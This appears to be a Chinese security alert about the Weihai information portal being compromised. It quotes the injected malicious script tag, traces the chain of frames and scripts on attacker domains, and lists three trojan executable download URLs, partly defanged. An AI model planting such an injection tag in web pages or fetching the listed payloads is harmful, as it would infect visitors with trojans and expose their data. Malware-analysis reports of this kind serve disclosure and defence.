注册
登录
| 关键词: http 655.8866 frame org geg htm script 恶意 病毒 com |
威海信息港(http://www.whinfo.net.cn/)被植入恶意代码。 用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。 MalUrl:http://shop.whinfo.net.cn/user/detail.asp?id=4643&bookid=2921 网页被嵌入恶意链接代码: <script src=http://3b3.org/c.js></script> 挂马分析: [wide]http://shop.whinfo.net.cn/user/detail.asp?id=4643&bookid=2921 [script]http://3b3.org/c.js [frame]http://8geg655.8866.org/a/a100.htm [frame]http://8geg655.8866.org/a/163.htm [frame]http://8geg655.8866.org/a/ggqm.htm [script]http://8geg655.8866.org/a/js.js [frame]http://8geg655.8866.org/a/gg14.htm [frame]http://8geg655.8866.org/a/ggfl.htm [frame]http://8geg655.8866.org/a/ggff.htm [frame]http://8geg655.8866.org/a/ggvod.htm [frame]http://8geg655.8866.org/a/e.htm [frame]http://8geg655.8866.org/a/ggbb.htm [frame]http://8geg655.8866.org/a/ggr.htm [frame]http://8geg655.8866.org/a/p.htm [script]http://js.tongji.cn.yahoo.com/1083501/ystat.js [script]http://s31.cnzz.com/stat.php?id=1408284&web_id=1408284 [frame]http://8geg655.8866.org/a/a100.htm [script]http://js.tongji.cn.yahoo.com/908507/ystat.js 最终下载病毒文件: hxxp://5l2o8.com/web/3.exe hxxp://yes9821.3322.org/web/activex.exe hxxp://exe316.com/web/xp.exe 通过执行以上病毒文件,来达到完全控制访问者的系统。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
